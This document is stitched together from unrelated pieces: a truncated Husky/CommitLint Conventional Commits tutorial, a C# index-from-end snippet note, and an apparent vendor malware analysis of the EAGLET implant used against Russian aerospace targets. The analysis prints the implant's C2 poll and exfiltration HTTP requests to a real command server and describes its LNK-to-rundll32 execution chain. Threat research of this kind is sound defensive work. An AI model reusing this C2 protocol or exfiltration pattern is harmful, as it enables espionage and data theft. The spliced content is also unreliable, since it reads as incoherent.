Conventional Commits are a set of rules that help you write commit messages using a format that has multiple purposes:
they help developers understand the history of a git branch;
they help PR reviewers focus on the Pull Request by understanding the changes proposed by the developer;
using automated tools, they help versioning the application – this is useful when using Semantic Versioning;
they allow you to create automated Changelog files.
So, what does an average Conventional Commit look like?
There’s not just one way to specify such formats.
For example, you can specify that you’ve added a new feature (feat) to your APIs and describe it shortly:
feat(api): send an email to the customer
Or you can explain that you’ve fixed a bug (using fix) and add a full description of the scope of the commit.
fix: prevent racing condition
Introduce a request id and a reference to latest request. Dismiss
incoming responses other than from latest request.
There are several types of commits that you can support, such as:
feat, used when you add a new feature to the application;
fix, when you fix a bug;
docs, used to add or improve documentation to the project;
refactor, used – well – after some refactoring;
test, when adding tests or fixing broken ones
All of this prevents developers from writing commit messages such as "something", "fixed bug", "some stuff".
So, now, it’s time to include Conventional Commits in our .NET applications.
What is our goal?
For the sake of this article, I’m going to add Conventional Commits in a .NET 7 API project. The same approach works for all the other types of .NET projects: as long as you have a Solution to work with, I’ve got you covered.
Well, actually, the following approach can be used by every project, not only those based on .NET: the reason I wrote this article is that many dotnet developers are not confident in using and configuring NPM packages, so my personal goal with this article is to give you the basics of such tools and configurations.
For the sake of this article, I’m going to explain how to add Conventional Commits with a custom format.
Say that you want to associate each commit to a Jira task. As you may know, Jira tasks have an ID composed of a project prefix and a numeric Id. So, for a project named FOO, you can have a task with Id FOO-123.
The goal of this article is, then, to force developers to create Commit messages such as
feat/FOO-123: commit short description
or, if you want to add a full description of the commit,
feat/FOO-123: commit short description
Here we can have the full description of the task.
And it can also be on multiple lines.
We are going to work at Solution level; you don’t even need an IDE: just Notepad and a Terminal are fine. Before continuing, open your solution folder and a Console pointing to the same folder.
Install NPM in your folder
Yes, even if the main application is built with .NET, we are gonna need some NPM packages to set up our Conventional Commits.
First things first: head to the Command Line and run npm init.
After specifying some configurations (Package name? Licence? Author?), you will have a brand new package.json file.
Now we can move on and add a GIT Hook.
Husky: integrate GIT Hooks to improve commit messages
To use conventional commits we have to “intercept” our GIT actions: we will need to run a specific tool right after having written a commit message; we have to validate it and, in case it does not follow the rules we’ve set, abort the operations.
We will use Husky 🔗: it’s a facility package that allows us to do stuff with our commit messages and, in general, integrate work with Git Hooks.
Head to the terminal, and install Husky by running
npm install husky --save-dev
This command will add a dependency to Husky, as you can see from the new item listed in the package.json file:
"devDependencies": {
"husky": "^8.0.3"}
Finally, to enable Git Hooks, we have to run
npm pkg set scripts.prepare="husky install"
and notice the new section in the package.json.
"scripts": {
"prepare": "husky install"},
Even with just these simple steps, we can see a first result: if you run git commit you will see a text editor open. Here you can write your commit message.
Save and close the file. The commit message has been applied, as you can see by running git log --oneline.
CommitLint: a package to validate Commit messages
We need to install and configure CommitLint (the @commitlint/cli and @commitlint/config-conventional NPM packages), which does the dirty job.
This snippet tells Commitlint to use the default conventions, such as feat(api): send an email.
To test the default rules without issuing any real commit, we have to install the previous packages globally, so that they can be accessed outside the scope of the git hooks:
echo 'foo: a message with wrong format' | commitlint
and see the error messages
At this point, we still don’t have CommitLint ready to validate our commit messages. In fact, if you try to commit your changes with an invalid message, you will see that the message passes the checks (because there are no checks!), and your changes get committed.
We need to do some more steps.
First of all, we have to create a folder named .husky that will be used by Husky to understand which commands are supported.
Notice: you have to keep the dot at the beginning of the folder name: it’s .husky, not husky.
Then we need to add a new file within that folder to tell Husky that it needs to run CommitLint.
The first value is a number that expresses the severity of the rule:
0: the rule is disabled;
1: show a warning;
2: it’s an error.
The second value defines if the rule must be applied (using always), or if it must be reversed (using never).
The third value provides generic arguments for the related rule. For example, "header-max-length": [2, "always", 50], tells that the header must always have a length with <= 50 characters.
But not before helping devs with a simple trick! As you remember, when you run git commit without specifying the message, an editor appears with some hints about the structure of the commit message.
You can set your own text with hints about the structure of the messages.
You just need to create a file named .gitmessage and put some text in it, such as:
# <type>/FOO-<jira-ticket-id>: <title>
# YOU CAN WRITE WHATEVER YOU WANT HERE
# allowed types: feat | fix | hot | chore
# Example:
#
# feat/FOO-01: first commit
#
# No more than 50 chars. #### 50 chars is here: #
# Remember blank line between title and body.
# Body: Explain *what* and *why* (not *how*)
# Wrap at 72 chars. ################################## which is here: #
#
Now, we have to tell Git to use that file as a template:
git config commit.template ./.gitmessage
and.. TA-DAH! Here’s your message template!
Putting all together
Finally, we have everything in place: git hooks, commit template, and template hints.
If we run git commit, we will see an IDE open and the message we’ve defined before. Now, type A message with wrong format, save, close the editor, and you’ll see that the commit is aborted.
Now, if you run git commit again, you'll see the editor again; type feat/FOO-123: a valid message, and you'll see it working.
Further readings
Conventional Commits is a project that lists a set of specifications for writing such good messages. You can read more here:
This new kind of commit message works well with Semantic Versioning, which can be useful to publish package versions with a meaningful version number, such as 2.0.1: 🔗 Semantic Versioning
And, to close the loop, Semantic Versioning can be easily integrated with CI pipelines. If you use .NET APIs and want to deploy your APIs to Azure using GitHub Actions, you can start from this article and add SemVer: 🔗 How to deploy .NET APIs on Azure using GitHub actions
Wrapping up
In this article, we've learned what Conventional Commits are, how to add them using Husky and NPM, and how to configure our folder to use such tools.
The steps we’ve seen before work for every type of application, even not related to dotnet.
So, to recap everything, we have to:
Install NPM: npm init;
Install Husky: npm install husky --save-dev;
Enable Husky: npm pkg set scripts.prepare="husky install";
Say that you have an array of N items and you need to access an element counting from the end of the collection.
Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:
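The original snippets aren't shown here; assuming a small sample array, the two approaches look like this:
var values = new[] { 10, 20, 30, 40, 50 };

// the classic way: compute the index starting from Length
var thirdFromEnd = values[values.Length - 3];   // 30

// the same element, using the index-from-end operator
var sameElement = values[^3];                   // 30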
Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, they are perfectly identical. IL is quite difficult to read and understand, but you can acknowledge that both syntaxes are equivalent by looking at the decompiled C# code:
Performance is not affected by this operator, so it’s just a matter of readability.
Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.
Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!
SEQRITE Labs APT-Team has recently found a campaign targeting the Russian aerospace industry. The campaign is aimed at employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, and uses consignment-note (товарно-транспортная накладная, TTN) documents, which are critical to Russian logistics operations. The malware ecosystem involved in this campaign relies on a malicious LNK file and the EAGLET DLL implant, which executes malicious commands and exfiltrates data.
In this blog, we will explore the technical details of the campaign we encountered during our analysis. We will examine its various stages, starting with a deep dive into the initial infection chain, moving on to the implant used in this campaign, and ending with an overall overview of the campaign.
Initial Findings
Recently, on the 27th of June, while hunting malicious spear-phishing attachments, our team found a malicious email file that surfaced on sources like VirusTotal. Upon further hunting, we also found a malicious LNK file responsible for executing the malicious DLL attachment, whose file type was masquerading as a ZIP attachment.
Looking into the email, we found that the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip, which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip, is actually a DLL file. Upon further hunting, we found another file, a shortcut [LNK] file with the same name. We then decided to look into the workings of these files.
Infection Chain
Technical Analysis
We will break down the analysis of this campaign into three different parts, starting with the malicious EML file, followed by the attachment, i.e., the malicious DLL implant, and finally the LNK file.
Stage 0 – Malicious Email File.
Initially, we found a malicious e-mail file named backup-message-10.2.2.20_9045-800282.eml, uploaded from the Russian Federation. We then looked into the specifics of the e-mail file.
We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO) from a Transport and Logistics Centre regarding a delivery note.
Looking into the contents of the email, we found that the message was crafted to deliver the news of a recent logistics movement, referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025); the email also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. Besides noticing that the threat actor impersonates an individual, we also noticed a malicious attachment masquerading as a ZIP file. Upon downloading it, we figured out that it was a malicious DLL implant.
Apart from the malicious DLL implant, we also hunted a malicious LNK file with the same name, which we believe has been dropped by another spear-phishing attachment and is used to execute this DLL implant, which we have termed EAGLET.
In the next section, we will look into the malicious LNK file.
Stage 1 – Malicious LNK File.
Looking inside the LNK file, we found that it performs a specific set of tasks that finally execute the malicious DLL file and also spawn a decoy pop-up on the screen. It does this in the following manner.
Initially, it uses the powershell.exe binary to run a script in the background, which enumerates the masquerading ZIP file, i.e., the malicious EAGLET implant. If it finds the implant, it executes it via the rundll32.exe LOLBIN; otherwise, it recursively looks for the file under %USERPROFILE% and runs it if found, and if that also fails, it looks under the %TEMP% location.
Once the DLL implant has been found and executed, the script extracts a decoy XLS file embedded within the implant: it reads the 59904-byte XLS file stored right after the first 296960 bytes and writes it under the %TEMP% directory with the name Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file; in the next section, we will look into the decoy file.
Stage 2 – Looking into the decoy file.
In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.
Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.
Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.
Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.
Overall, the decoy basically simulates an official Russian container inspection document (specifically, an Equipment Interchange Report, or EIR) used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts, and is associated with Obltransterminal LLC. In the next section, we will look into the EAGLET implant.
Stage 3 – Malicious EAGLET implant.
Initially, we loaded the implant into a PE-analysis tool and confirmed that this is a PE file, with the decoy stored inside the overlay section, which we already saw previously.
Next, looking into the exports of this malicious DLL, we checked the EntryPoint, which unfortunately did not contain anything interesting. We then looked into the DllEntryPoint, which led us to the DllMain, which did contain interesting code related to malicious behavior.
The first interesting function basically enumerates info about the target machine.
In this function, the code creates a unique GUID for the target, which is used to identify the victim. Every time the implant is executed, a new GUID is generated; this mimics the behavior of a session ID and helps the operator, or threat actor, keep track of the target.
Then, it enumerates the computer name of the target machine along with the hostname and DNS domain name. Once it has that information, it creates a directory known as MicrosoftApppStore under the ProgramData location.
Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.
Next, we can see that the implant uses certain Windows networking APIs, such as WinHttpOpen, to initiate an HTTP session, masquerading under an uncommon-looking user-agent string, MicrosoftAppStore/2001.0. This is followed by another API, WinHttpConnect, which tries to connect to the hardcoded command-and-control [C2] server 185.225.17.104 over port 80; in case it fails, it keeps retrying.
In case the implant connects to the C2, it forms a URL path which is used to send a GET request to the C2 infrastructure. The entire request body looks something like this:
GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
Host: 185.225.17.104
After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain instructions.
Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.
Another feature of this implant is the download functionality, which either downloads malicious content from the server or exfiltrates required or interesting files from the target machine. The download feature retrieves malicious content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As the C2 is down while this research is being published, the files which had been, or are being, used could not be discovered.
Later, another functionality, separate from the download feature, also became quite evident: the implant exfiltrates data from the target machine. The request body looks something like this:
POST /result HTTP/1.1
Host: 185[.]225[.]17[.]104
Content-Type: application/x-www-form-urlencoded

id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==
Therefore, the features are as follows.
| Feature | Trigger Keyword | Behavior | Purpose |
| --- | --- | --- | --- |
| Command Execution | cmd: | Executes a shell command received from the C2 server and captures the output | Remote Code Execution |
| File Download | download: | Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\ | Payload Staging |
| Exfiltration | (automatic) | Sends back the result of command execution or download status to the C2 server via HTTP POST | Data Exfiltration |
That sums up the technical analysis of the EAGLET implant. Next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.
Hunting and Infrastructure
Infrastructural details
In this section, we will look into the infrastructure-related artefacts. The C2, which we found to be 185[.]225[.]17[.]104, is responsible for communicating with the EAGLET implant. The C2 server is located in Romania under ASN 39798, belonging to MivoCloud SRL.
Looking into it, we found a lot of passive DNS records pointing to historical infrastructure previously associated with a threat cluster linked to TA505, which has been researched by BinaryDefense. The DNS records suggest that similar or recycled infrastructure has been used in this campaign. Apart from this infrastructural correlation with TA505, limited to the use of recycled domains, we also saw some other dodgy domains with DNS records pointing towards this same infrastructure. With high confidence, we can state that the current campaign has no correlation with TA505 beyond the afore-mentioned information.
Similar to the campaign targeting the aerospace sector, we have also found another campaign targeting the Russian military sector through recruitment-themed documents. In that campaign, the threat actor used an EAGLET implant which connects to the C2 188[.]127[.]254[.]44, located in Russia under ASN 56694, belonging to the LLC Smart Ape organization.
Similar Campaigns
Campaign 1 – Military Themed Targeting
Initially, the URL body and many other behavioral artefacts of the implant led us to another set of campaigns, with an almost identical implant, used to target Russian military recruitment.
This decoy was extracted from an EAGLET implant named Договор_РН83_изменения.zip, which translates to Contract_RN83_Changes, and which has been targeting individuals and entities related to Russian military recruitment. As we can see, the decoy highlights multiple advantages of serving, ranging from a house mortgage to a pension and many more.
Campaign 2 – EAGLET implant with no decoy embedded
In the previous campaigns we saw that, occasionally, the threat entity drops a malicious LNK which executes the DLL implant and extracts the decoy present inside the implant's overlay section; in this case, however, we also saw an implant with no such decoy present inside.
Along with these, we also saw multiple overlaps between these campaigns, such as similar target interests and implant code overlap with the threat entity known as Head Mare, which has been targeting Russian-speaking entities and was initially discovered by researchers at Kaspersky.
Attribution
Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.
In our ongoing tracking of UNG0901, we discovered notable similarities and overlaps with the threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.
Key Overlaps Between UNG0901 and Head Mare
Tooling Arsenal:
Researchers at Kaspersky observed that Head Mare often uses a Golang-based backdoor known as PhantomDL, which is often packed using a software packer such as UPX and has very simple yet functional features such as shell, download, upload, and exit. Similarly, UNG0901 has deployed the EAGLET implant, which shows similar behavior and has nearly identical features such as shell, download, and upload, but is programmed in C++.
File-Naming technique:
Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523; similarly, in the campaigns by UNG0901 we witnessed filenames with a similar style, such as Contract_RN83_Changes, and many more file-naming schemes which we found to be similar.
Motivation:
Head Mare has been targeting important entities related to Russia, and UNG0901 has likewise targeted multiple important entities belonging to Russia.
Apart from these, there are additional strong similarities which reinforce the connection between these two threat entities; therefore, we assess that the UNG0901 threat entity shares resources and many other similarities with Head Mare, targeting Russian governmental & non-governmental entities.
Conclusion
UNG0901, or Unknown-Group-901, demonstrates a targeted cyber operation against Russia's aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare, showing multiple similarities such as decoy nomenclature and much more.